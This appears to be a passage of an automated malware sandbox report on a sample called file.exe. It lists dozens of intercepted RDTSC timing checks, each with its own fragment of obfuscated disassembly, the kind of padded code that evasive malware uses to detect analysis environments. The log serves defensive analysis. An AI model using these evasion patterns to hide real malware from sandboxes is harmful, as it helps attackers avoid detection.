                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA1E2 second address: 6FA1FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA43130E31Fh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA341 second address: 6BA345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA345 second address: 6BA35B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA43130E316h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FA43130E31Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE3BD second address: 6FE3CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE3CE second address: 6FE3E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE3E9 second address: 6FE3ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70333A second address: 70334F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E321h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70334F second address: 703356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7044C3 second address: 7044CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA43130E316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF601 second address: 6FF606 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700591 second address: 7005A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF693 second address: 6FF69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF69E second address: 6FF6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7035B6 second address: 7035BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70859D second address: 7085BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007FA43130E316h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA43130E323h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7085BF second address: 708626 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FA430E679E8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 pushad 0x00000027 jmp 00007FA430E679F4h 0x0000002c mov dx, BE67h 0x00000030 popad 0x00000031 push 00000000h 0x00000033 mov edi, dword ptr [ebp+122D3291h] 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FA430E679F0h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708626 second address: 708630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FA43130E316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7077AA second address: 7077AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70589F second address: 7058B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA43130E31Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7095D0 second address: 7095F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 mov bx, di 0x00000009 mov dword ptr [ebp+122D1A2Ah], edx 0x0000000f push 00000000h 0x00000011 mov bx, di 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 add ebx, 2F924197h 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push ebx 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708771 second address: 708775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B573 second address: 70B579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B579 second address: 70B57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B57F second address: 70B585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B585 second address: 70B589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70BC28 second address: 70BC2E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70BE06 second address: 70BE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CF53 second address: 70CF5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FA430E679E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CF5D second address: 70CF61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713BA1 second address: 713BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713BA7 second address: 713BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716BAE second address: 716BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B0AF second address: 71B0CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E321h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push ecx 0x0000000c jnl 00007FA43130E31Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B1B5 second address: 71B1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edx 0x0000000b jmp 00007FA430E679F6h 0x00000010 pop edx 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B1DE second address: 71B1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71E7DF second address: 71E7FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA430E679F9h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71E7FE second address: 71E804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71E804 second address: 71E80D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71E80D second address: 71E823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FA43130E316h 0x00000010 jbe 00007FA43130E316h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71E823 second address: 71E827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71E827 second address: 71E82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722887 second address: 722899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA430E679E6h 0x0000000a jno 00007FA430E679E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722899 second address: 7228B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FA43130E318h 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FA43130E322h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7228B1 second address: 7228C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA430E679E6h 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7228C2 second address: 7228C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722BB2 second address: 722BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FA430E679E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722EDE second address: 722F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA43130E31Fh 0x00000009 popad 0x0000000a jbe 00007FA43130E32Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722F0E second address: 722F2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 722F2C second address: 722F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA43130E325h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7232EE second address: 723306 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA430E679EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FA430E679E6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 723459 second address: 72345F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72345F second address: 7234AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FA430E679EDh 0x0000000f pop eax 0x00000010 jc 00007FA430E679ECh 0x00000016 jc 00007FA430E679E6h 0x0000001c jmp 00007FA430E679F1h 0x00000021 pushad 0x00000022 jmp 00007FA430E679ECh 0x00000027 jp 00007FA430E679E6h 0x0000002d pushad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7288AC second address: 7288BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7276A0 second address: 7276A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7276A4 second address: 7276AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7276AF second address: 7276B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F24E2 second address: 6F2552 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA43130E316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007FA43130E326h 0x00000012 lea eax, dword ptr [ebp+12484244h] 0x00000018 mov dword ptr [ebp+122D1851h], ecx 0x0000001e nop 0x0000001f jmp 00007FA43130E326h 0x00000024 push eax 0x00000025 pushad 0x00000026 jmp 00007FA43130E328h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FA43130E31Eh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F263B second address: 6F2641 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2641 second address: 6F2647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2B1A second address: 6F2B20 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2B20 second address: 6F2BB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E323h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 6233E3A3h 0x00000010 sub dh, 00000042h 0x00000013 call 00007FA43130E319h 0x00000018 jmp 00007FA43130E31Eh 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007FA43130E326h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 pop edx 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d pushad 0x0000002e jmp 00007FA43130E323h 0x00000033 jmp 00007FA43130E31Fh 0x00000038 popad 0x00000039 mov eax, dword ptr [eax] 0x0000003b push edi 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FA43130E322h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2BB4 second address: 6F2BE1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA430E679E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 jnl 00007FA430E679E8h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA430E679F3h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F34CA second address: 6F34F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA43130E316h 0x0000000a popad 0x0000000b jp 00007FA43130E326h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007FA43130E316h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F34F7 second address: 6F3513 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DBCB7 second address: 6DBD02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jns 00007FA43130E316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FA43130E326h 0x00000012 jmp 00007FA43130E31Eh 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA43130E327h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 727987 second address: 7279A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA430E679F7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7279A2 second address: 7279DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a je 00007FA43130E316h 0x00000010 jmp 00007FA43130E320h 0x00000015 push edi 0x00000016 pop edi 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FA43130E322h 0x00000021 push eax 0x00000022 pop eax 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 727B79 second address: 727BAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679F3h 0x00000007 jmp 00007FA430E679F7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007FA430E679ECh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 727BAF second address: 727BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 727E7F second address: 727E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA430E679F6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 727E99 second address: 727EA3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA43130E31Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 727FD9 second address: 727FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72B502 second address: 72B506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72B506 second address: 72B521 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679F7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 730CB3 second address: 730CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA43130E320h 0x00000009 jc 00007FA43130E316h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72F6FD second address: 72F707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72F707 second address: 72F70D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72F70D second address: 72F71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007FA430E679E6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72FAF0 second address: 72FB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA43130E316h 0x0000000a pop esi 0x0000000b pushad 0x0000000c jmp 00007FA43130E31Fh 0x00000011 pushad 0x00000012 popad 0x00000013 jnc 00007FA43130E316h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72FB14 second address: 72FB2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA430E679F5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72FB2F second address: 72FB33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72FC5B second address: 72FC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72FDE3 second address: 72FDFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E326h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72FDFD second address: 72FE0D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA430E679F2h 0x00000008 ja 00007FA430E679E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72FE0D second address: 72FE2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FA43130E322h 0x0000000b jg 00007FA43130E316h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72FE2B second address: 72FE2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72FE2F second address: 72FE3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72FE3F second address: 72FE43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72FE43 second address: 72FE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jp 00007FA43130E316h 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73014D second address: 730153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 734349 second address: 73434D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73434D second address: 73435C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73435C second address: 734362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7391EE second address: 73920A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679F1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7394BA second address: 7394BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
